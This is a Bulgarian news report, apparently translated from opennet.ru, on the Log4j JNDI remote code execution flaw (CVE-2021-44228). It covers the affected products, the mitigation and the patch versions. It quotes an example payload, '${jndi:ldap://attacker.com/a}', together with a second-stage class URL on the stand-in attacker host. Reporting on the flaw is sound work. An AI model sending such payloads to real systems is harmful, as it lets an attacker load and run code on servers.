ΠšΠ°Ρ‚Π°ΡΡ‚Ρ€ΠΎΡ„Π°Π»Π½Π° уязвимост Π² Apache Log4j, засягаща ΠΌΠ½ΠΎΠ³ΠΎ Java ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ΠΈ

Π’ Apache Log4j, популярна Ρ€Π°ΠΌΠΊΠ° Π·Π° ΡƒΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΠ΅ Π½Π° Π»ΠΎΠ³ΠΎΠ²Π΅Ρ‚Π΅ Π² Java прилоТСния, Π΅ ΠΎΡ‚ΠΊΡ€ΠΈΡ‚Π° ΠΊΡ€ΠΈΡ‚ΠΈΡ‡Π½Π° уязвимост, която позволява ΠΈΠ·ΠΏΡŠΠ»Π½Π΅Π½ΠΈΠ΅Ρ‚ΠΎ Π½Π° ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ ΠΏΡ€ΠΈ запис Π½Π° спСциално Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€Π°Π½Π° стойност Π² Π»ΠΎΠ³ΠΎΠ²Π΅ във Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ "{jndi:URL}". Атаката ΠΌΠΎΠΆΠ΅ Π΄Π° бъдС възмоТна Π½Π° Java прилоТСния, ΠΊΠΎΠΈΡ‚ΠΎ записват стойности Π² Π»ΠΎΠ³ ΠΎΡ‚ външни ΠΈΠ·Ρ‚ΠΎΡ‡Π½ΠΈΡ†ΠΈ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, ΠΏΡ€ΠΈ ΠΈΠ·Π²Π΅ΠΆΠ΄Π°Π½Π΅ Π½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΠ½ΠΈ стойности Π² ΡΡŠΠΎΠ±Ρ‰Π΅Π½ΠΈΡ Π·Π° Π³Ρ€Π΅ΡˆΠΊΠΈ.

ΠžΡ‚Π±Π΅Π»ΡΠ·Π²Π° сС, Ρ‡Π΅ ΠΏΠΎΡ‡Ρ‚ΠΈ всички ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ΠΈ, ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Ρ‰ΠΈ Ρ€Π°ΠΌΠΊΠΈ ΠΊΠ°Ρ‚ΠΎ Apache Struts, Apache Solr, Apache Druid ΠΈΠ»ΠΈ Apache Flink, са уязвими, Π²ΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»Π½ΠΎ Steam, Apple iCloud, ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΈ ΠΈ ΡΡŠΡ€Π²ΡŠΡ€ΠΈ Π½Π° ΠΈΠ³Ρ€Π°Ρ‚Π° Minecraft. ΠžΡ‡Π°ΠΊΠ²Π° сС уязвимостта Π΄Π° Π΄ΠΎΠ²Π΅Π΄Π΅ Π΄ΠΎ вълна ΠΎΡ‚ масови Π°Ρ‚Π°ΠΊΠΈ срСщу ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½ΠΈ прилоТСния, повтаряйки историята Π½Π° ΠΊΡ€ΠΈΡ‚ΠΈΡ‡Π½ΠΈΡ‚Π΅ уязвимости Π² Ρ€Π°ΠΌΠΊΠ°Ρ‚Π° Apache Struts, която, спорСд ΠΏΡ€ΠΈΠ±Π»ΠΈΠ·ΠΈΡ‚Π΅Π»Π½ΠΈ ΠΎΡ†Π΅Π½ΠΊΠΈ, сС ΠΏΡ€ΠΈΠ»Π°Π³Π° Π² ΡƒΠ΅Π± прилоТСния Π½Π° 65% ΠΎΡ‚ ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈΡ‚Π΅ Π² списъка Fortune 100. Π’Π΅Ρ‡Π΅ са рСгистрирани ΠΎΠΏΠΈΡ‚ΠΈ Π·Π° сканиранС Π½Π° ΠΌΡ€Π΅ΠΆΠ°Ρ‚Π° Π·Π° уязвими систСми.

ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ сС услоТнява, Ρ‚ΡŠΠΉ ΠΊΠ°Ρ‚ΠΎ Π²Π΅Ρ‡Π΅ Π΅ ΠΏΡƒΠ±Π»ΠΈΠΊΡƒΠ²Π°Π½ Ρ€Π°Π±ΠΎΡ‚Π΅Ρ‰ Сксплоит, Π½ΠΎ ΠΊΠΎΡ€Π΅ΠΊΡ†ΠΈΠΈ Π·Π° стабилнитС вСрсии Π² ΠΌΠΎΠΌΠ΅Π½Ρ‚Π° Π½Π΅ са Ρ„ΠΎΡ€ΠΌΡƒΠ»ΠΈΡ€Π°Π½ΠΈ. Π˜Π΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚ΠΎΡ€ΡŠΡ‚ Π½Π° CVE всС ΠΎΡ‰Π΅ Π½Π΅ Π΅ присвоСн. ΠšΠΎΡ€Π΅ΠΊΡ†ΠΈΡ Π΅ Π²ΠΊΠ»ΡŽΡ‡Π΅Π½Π° само Π² тСстовата вСрсия log4j-2.15.0-rc1. ΠšΠ°Ρ‚ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎ Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ Π·Π° Π±Π»ΠΎΠΊΠΈΡ€Π°Π½Π΅ Π½Π° уязвимостта сС ΠΏΡ€Π΅ΠΏΠΎΡ€ΡŠΡ‡Π²Π° Π·Π°Π΄Π°Π²Π°Π½Π΅ Π½Π° ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚ΡŠΡ€Π° log4j2.formatMsgNoLookups Π½Π° стойност true.

ΠŸΡ€ΠΎΠ±Π»Π΅ΠΌΡŠΡ‚ Π΅ ΠΏΠΎΡ€ΠΎΠ΄Π΅Π½ ΠΎΡ‚ Ρ„Π°ΠΊΡ‚Π°, Ρ‡Π΅ log4j ΠΏΠΎΠ΄Π΄ΡŠΡ€ΠΆΠ° ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ° Π½Π° спСциални маски "{}" Π² Π»ΠΎΠ³ΠΎΠ²ΠΈΡ‚Π΅ Π½ΠΈΠ·ΠΎΠ²Π΅, Π² ΠΊΠΎΠΈΡ‚ΠΎ ΠΌΠΎΠ³Π°Ρ‚ Π΄Π° сС ΠΈΠ·Π²ΡŠΡ€ΡˆΠ²Π°Ρ‚ заявки ΠΏΠΎ JNDI (Java Naming and Directory Interface). Атаката сС свСТда Π΄ΠΎ ΠΏΡ€Π΅Π΄Π°Π²Π°Π½Π΅ Π½Π° Π½ΠΈΠ· с подмяна "${jndi:ldap://attacker.com/a}", ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚ΠΊΠ°Ρ‚Π° Π½Π° ΠΊΠΎΠΉΡ‚ΠΎ log4j Ρ‰Π΅ ΠΈΠ·ΠΏΡ€Π°Ρ‚ΠΈ Π½Π° ΡΡŠΡ€Π²ΡŠΡ€ attacker.com LDAP заявка Π·Π° ΠΏΡŠΡ‚Ρ Π΄ΠΎ Java клас. Π’ΡŠΡ€Π½Π°Ρ‚ΠΈΡΡ‚ ΡΡŠΡ€Π²ΡŠΡ€Π°. ΠΏΡŠΡ‚ Π½Π° атакуващия (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, http://second-stage.attacker.com/Exploit.class) Ρ‰Π΅ бъдС Π·Π°Ρ€Π΅Π΄Π΅Π½ ΠΈ изпълнСн Π² контСкста Π½Π° тСкущия процСс, ΠΊΠΎΠ΅Ρ‚ΠΎ позволява Π½Π° атакуващия Π΄Π° постигнС ΠΈΠ·ΠΏΡŠΠ»Π½Π΅Π½ΠΈΠ΅Ρ‚ΠΎ Π½Π° ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»Π΅Π½ ΠΊΠΎΠ΄ Π² систСмата с ΠΏΡ€Π°Π²Π°Ρ‚Π° Π½Π° Ρ‚Π΅ΠΊΡƒΡ‰ΠΎΡ‚ΠΎ ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠ΅.

Π”ΠΎΠΏΡŠΠ»Π½Π΅Π½ΠΈΠ΅ 1: УязвимоститС са ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠ»ΠΈ ΠΈΠ΄Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ‚ΠΎΡ€ CVE-2021-44228.

Π”ΠΎΠΏΡŠΠ»Π½Π΅Π½ΠΈΠ΅ 2: ΠžΡ‚ΠΊΡ€ΠΈΡ‚ Π΅ Π½Π°Ρ‡ΠΈΠ½ Π·Π° заобикалянС Π½Π° Π·Π°Ρ‰ΠΈΡ‚Π°Ρ‚Π°, Π΄ΠΎΠ±Π°Π²Π΅Π½Π° с вСрсията log4j-2.15.0-rc1. ΠŸΡ€Π΅Π΄Π»ΠΎΠΆΠ΅Π½ΠΎ Π΅ Π½ΠΎΠ²ΠΎ ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅ log4j-2.15.0-rc2 с ΠΏΠΎ-пълна Π·Π°Ρ‰ΠΈΡ‚Π° срСщу уязвимостта. Π’ ΠΊΠΎΠ΄Π° сС ΠΏΠΎΠ΄Ρ‡Π΅Ρ€Ρ‚Π°Π²Π° ΠΈΠ·ΠΌΠ΅Π½Π΅Π½ΠΈΠ΅, ΡΠ²ΡŠΡ€Π·Π°Π½ΠΎ с липсата Π½Π° Π°Π²Π°Ρ€ΠΈΠΉΠ½ΠΎ прСкратяванС Π² случай Π½Π° ΠΈΠ·ΠΏΠΎΠ»Π·Π²Π°Π½Π΅ Π½Π° Π½Π΅ΠΏΡ€Π°Π²ΠΈΠ»Π½ΠΎ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ΠΈΡ€Π°Π½ JNDI URL.

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru

ΠšΡƒΠΏΠ΅Ρ‚Π΅ Π½Π°Π΄Π΅ΠΆΠ΄Π΅Π½ хостинг Π·Π° сайтовС с Π·Π°Ρ‰ΠΈΡ‚Π° ΠΎΡ‚ DDoS, VPS VDS ΡΡŠΡ€Π²ΡŠΡ€ΠΈ πŸ”₯ ΠšΡƒΠΏΠ΅Ρ‚Π΅ Π½Π°Π΄Π΅ΠΆΠ΄Π΅Π½ хостинг Π·Π° сайтовС с Π·Π°Ρ‰ΠΈΡ‚Π° ΠΎΡ‚ DDoS, VPS VDS ΡΡŠΡ€Π²ΡŠΡ€ΠΈ | ProHoster